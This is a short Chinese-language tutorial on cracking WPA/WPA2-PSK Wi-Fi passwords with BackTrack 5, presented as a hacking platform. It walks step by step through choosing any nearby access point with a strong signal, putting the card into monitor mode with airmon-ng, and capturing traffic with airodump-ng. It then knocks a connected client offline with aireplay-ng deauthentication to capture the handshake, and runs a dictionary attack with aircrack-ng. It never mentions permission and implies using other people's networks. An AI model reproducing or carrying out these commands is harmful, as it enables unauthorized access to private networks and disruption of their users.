BackTrack5无线密码破解WPAWPA2-PSK型无线密码
全称[1]Back Track five[2]是继bt3,bt4之后的最新版,这是一个linux环境的便携系统,可以放到U盘或者硬盘中启动。
是圈内非常著名的黑客攻击平台,是一个封装好的Linux操作系统,内置大量的网络安全检测工具以及黑客破解软件等。
Back Track因可以方便的破解无线网络而出名,其中内置的spoonwep是一个非常强悍的图形化破解WEP无线网络密码的工具。
操作方法
- 01
打开BT5的Wicd network manager,在application下的internet中。选择一个新号较好的AP(那样子用起来才爽嘛)。然后看它的properties,打开properties以后继续打开里面的属性看看这个AP的mac地址跟channel。
- 02
ifconfig看看自己的无线网卡的名称,一般是wlan0或者wifi0,后文中根据实际情况执行命令。
- 03
开启无线监控 airmon-ng start wlan0 6 注:wlan0为你的无线设备名称 6为你要开启的信道(但是这里的6其实并没有那么重要的说) 如看到提示有XXXX XXXX进程影响,没关系,kill XXX XXX XXX为给出的进程号,然后重新执行上句直到不报错。
- 04
开始用BT5对其进行监控 airodump-ng -w nenew -c 4 --bssidAP‘s MAC mon0
- 05
根据上图,我们可以找到四个Client客户端的MAC地址,从里面随便选个(最好选择活跃点儿的)。打开一个新的终端,上一个终端不要关闭,后面还需要用到。 在新终端中输入: aireplay-ng -0 10 -a AP’s MAC -c CP’s MAC mon0
- 06
执行一次看第一个终端中是否出现了下图所示的标志WAP Handshake 。如果出现了,那么恭喜,你离成功已经不远了。如果没有出现就继续重复5的命令就ok了,直到出现握手。
- 07
对BT5握手抓到的包进行破解工作 aircrack-ng -w password.txt -b AP’s MAC nenew.cap 其中的password.txt为我们需要预置的字典文件,字典文件网上很多。